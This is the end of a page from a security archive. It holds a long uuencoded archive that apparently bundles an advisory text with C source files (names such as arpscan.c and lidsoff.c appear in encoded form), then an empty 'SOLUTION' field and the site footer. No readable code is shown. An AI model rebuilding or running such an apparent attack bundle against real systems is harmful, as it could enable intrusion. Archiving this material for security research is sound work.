M)N\\AS64PJ)`LPB$J#N,1!=W!-(DJ)`\\^\\4PQ(8JYXGEV0T#3_`F-0+(Q=H^#
MIWD6-*,GN5@0+OD1+(_@:<HP+LA\"E*=$3%Y()7BB\".VB$J>J7*@+L9\"QAY0_
ML\"QAE,T)Z(E+=H,WQ\"45\\./DISBL4EX$^70WR.UXO-C,*-P@\\`G$XT=.Y$_%
M>.^2GW8DGQ\"2+)+IR7U:\\MO!E5TWE5G#<EGJW7*S7`ZN\\*-MS$4$BX[/&;[5
MMNE_W6)\"KVQM_6&X^3X8^`,^:\\3`[R1Z^\\LEOMGVV&TTOLKE*4&1D#J&[_^A
ML=)>?VBCX/U@8)L0>S;^^AWBTD=OBI?^YOY<WOV\'<OQV:#SQN\'Z7C^!C0^A8
MM;TWU-%=4^@*OZWL>C#X&U!+`P04````\"`#:C\"$L(:%L\\-0$```\\\"0``\"0``
M`&-A<\'-C86XN8[5676_B1A1]AE]QE:H-1\"[)IGW:[%9RC!.F(C;U1[+1=L4:
M>P\"KQD8S`RRM]K_WW`$42![ZU\"@AP_TX]]PSUQ<N+]IT05ZSW*IR-C?4\\;IT
M?75U3;&1667F/7:[5476K4E)+=5:%FQG5R2+4AM53E:F;&K*ZH)66E)9DVY6
M*I?6,BGK3&UIVJB%=FA3FCDUROYO5H91%DU13LL\\8PR\',B5I*=6B-$86M%3-
MNBQP,//,X$4\"IZJ:35G/*&_JHN0DS2B<MY#F/9_?]5Y1T]1,#YSRID#D2ANT
M8S)P9=1LTJS9M5>\"0?!3-Z;,I8.(4E,%/(9Y*6O;.^6$HGF5E0NIK\';7;XF@
MX)$B!R+HLUB!W/_#A79=[I&*)E\\M9&VRPZ5=XCX:^!4M,B-5F57Z17A[80Q\\
MW(9M[I>>G8VL6$ME2LTE7_*Y``+9.)6966%T^-IY/,#;-J&;J=G@VO:TK!(H
MLJRR[:M.LORONME4LIA)QGV_SR!*&&>GG4&3>;4JY`LP%7(MJV:)+B;;DYG^
MM8=4276VD`<[N&]99)I(9@DQ&Y)UT2AFK+C(HC$\'KON2&A54B0>\"IG\"?=G68
M<-)+F?-\\(ZGDP5<\\V?4!B\"==Z[VD;$P&(J8XO$N>W,@GG$=1^\"CZ?I]NG^\'T
MR4V301C1UZ]N#/?Y.;E!\'W_/G.Q_&D5^\'!/\\XF$T%,@\"3.0&B?!CAT3@#=.^
M\".X=NDT3\"L*$AN)!)`A+0H?1&>1M)H5W].!\'W@!OW5LQ%,FSK7HGDH#+W:&>
M2R,W2H27#MV(1FDT\"F.+QEWT1>P-7?\'@]WL$$BA,_J,?)!0/W.\'PN*M;\'XS<
MVZ%-M;#!,](CWTN8_LO)@R0@,W0H\'OF>X(/_R0=S-WIVN\'\\O#&+_CQ1!<#):
MWWUP[]%+YS]4@-Y>&OD/S`]]Q^EMG(@D37RZ#\\-^S%\"`C_WH47A^?$/#,+8\"
MI;\'OH$CBVO)`@3IP<U-I+*Q.(DC\\*$I\'B0B#+@,-PB<(`;(NLOM6TS\"P/4.3
M,\'IF7-;#2N[0T\\\"\'/6()T5X2N:Q%G$3\"2QCM*!)5DS!*CIJEP+\\?BGL_\\\'SV
MA@ST)&*_BQL2,0>(7>4GUXY2F-KV^6[`;7<\\FDS\'WB\").W+[CX+)[X-Q[[\'8
MSTAXQTAQZ@WVZO.07[9_V#^I]$&;HFQZ\\]^.3%*I^I5);_6EV2ZE?F7&.JIG
MI[95C2U5O$W7V\':GUJ)46\"6GMFE>F^K$=)9GR][\\K-UNRV]8;34MRV)L:).5
MIE/6ABZZ-^WVNBD+;\"[9P3K&#LOGF:(+W6W_TV[A^5:-ZFB$M>0W)-GV\\.X[
M(!E@@4\\@BY2I6>[L<R_P9FWS47Z,;:3&<YEAU]#\\YLA69\":C`I^I$B1:\\Q[V
M,&\\2^DCCH0C23V//\'>TG8HPIBS%U-QR\'\'A!SQ4GEE#I<F3[0=9=0L#7%FJK-
MM`,9P=6ALU1G,_F>?M3T^>?-%[Q,OOQ9GSFT(PG`76/O^(BN6I<7]#NO<HMC
M%SD(:Y\"D>8;/M:TT/`.\'RNO/[[[@ESY^I//-^8X\"NY`SDZ;ST]RAGS:R\"WY7
M7;A:+//9SGG&VK=:\"[G0\'`DAKAS2Y=^RF7:*KF5F.8P1W@$(D`J;\\IUDQ5]3
MWC*8[!E,U,I(SM.=75LM?%=8X?JO;EKM[ZUVJ]W^%U!+`P04````\"`#:C\"$L
MS[\\Y?JH!``#C`@``\"0```&QI9\'-O9F8N8XV1T6O;,!#&GZV_XG#)L(.=.&/L
MH<WRU##&`BO-QA[:8C3I\'(LJDI\'D++3L?]])R:#=P]B+.7VGWW>?3_,I;-5^
MT`C<2/!A\')2$QSWN8>!!].B@LPXVGZZW,P93V\"B!QJ.$T4CJA1[AX\\UF!I=U
M2>TYNU!&Z%$B+\'V0RL[ZU0MI-(K4UUHG3-\"O)73._$42IM6/J+&#I8!282&L
M\\0%$SQU,?<F>6380:5WARRN6X5&%(CG1Z1=C3)D`>ZY,$0ON=J(ZLU,Z\'!+/
MLJ0\\H;/D8+NN#4!?JB,3EW+%J.Z@B#PLX6T)A&6#HWY7Y-\\\\W^$E3#PLN92N
MMEVME?2MMH+KUII:F;K\'X^K>W)N\\@M-@<L\\<AM$96%!-4;.T_@\\`=D!3Y\'.)
MAWF4\"/G2WEY_OXU,3)\'N+:$IR2)N)(]`7L:0%)L<?\'#!CCK&/=PM\'BIH*EB\\
MC_B?R!=P$Y]9F1W<38X/*1>Q];ODHCWB8QIS5BO8KM>?V^WZ:S1QR.6Y^R8N
MK0*OGM!V13R4+\\=,)-0K:))]:OZ\'>[Q\'_]!0^=.I@/^>)+3UIRNG9&FA37KZ
MWU!+`P04````\"`#:C\"$LR/=FYU0```\",````\"````$UA:V5F:6QE4^;B2LS)
ML5)(3BPH3D[,X^)*SDE-S+/BXBS*5=`M2E/0TLL\'BB46Z.6#U>@E<W&J:#@[
M:RKHA@/U*>@F0T6YH`;`3=*#R.2CJD>35-#-A]NLP`4`4$L#!!0````(`-J,
M(2RK/\"_.(@$``+\\!```!````>%6006_\",`R%S_A7>.52$-\"Q:QF\'P2:AH3&!
MIAVFJ4I3LT8+2=6X:`CQWY>`IA4IAR_/SK-?NC=)KDSB2H`NSFH23`X3WE5)
M;NUNY\"P>;(,[]56R;V@<(5O4Q+A<S#<>Q#=*48E<:<6*G._A\\Y,:74E:CP\"D
MX.F_H9Q,LL?54Y9\"5QFIFX)PXKA0=E1.6U)CE%>OM:TTK(,$F3**XQX<H2-+
M46-??\'SB/1ZC<Y9<N#(:X,O;<GE*H>.(&U7$MSW/4EM\'`2\\P_H.[4+05F3A*
M\"MHGS`?OL,K6\\_=U*!5-=3$(,`Y`/R3W%/?%0`S\"I*#5?E)M<#A.X>27##%]
M?(E#?[:OBUGK7[UB6U<+NL#A@_-A2.2:VJ7K3F>!9&DQ6CU\'*<`O4$L!`A8+
M%`````@`F;,B+&NZ`B,H#P``J\"<```L``````````0`@`(\"!`````&%R=&EC
M;&4N=\'AT4$L!`A8+%`````@`VHPA+-$[4ZZ)\"@``9!L```4``````````0`@
M`(\"!40\\``&-A<\"YC4$L!`A8+%`````@`VHPA+&1QB;K2`P``U0<```4`````
M`````0`@`(\"!_1D``&-A<\"YH4$L!`A8+%`````@`VHPA+\"&A;/#4!```/`D`
M``D``````````0`@`(\"!\\AT``&-A<\'-C86XN8U!+`0(6\"Q0````(`-J,(2S/
MOSE^J@$``.,\"```)``````````$`(`\"`@>TB``!L:61S;V9F+F-02P$\"%@L4
M````\"`#:C\"$LR/=FYU0```\",````\"``````````!`\"``@(&^)```36%K969I
M;&502P$\"%@L4````\"`#:C\"$LJSPOSB(!``\"_`0```0`````````!`\"``@($X
:)0``>%!+!08`````!P`\'`\'(!``!Y)@``````
`
end
SOLUTION
Noe yet
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
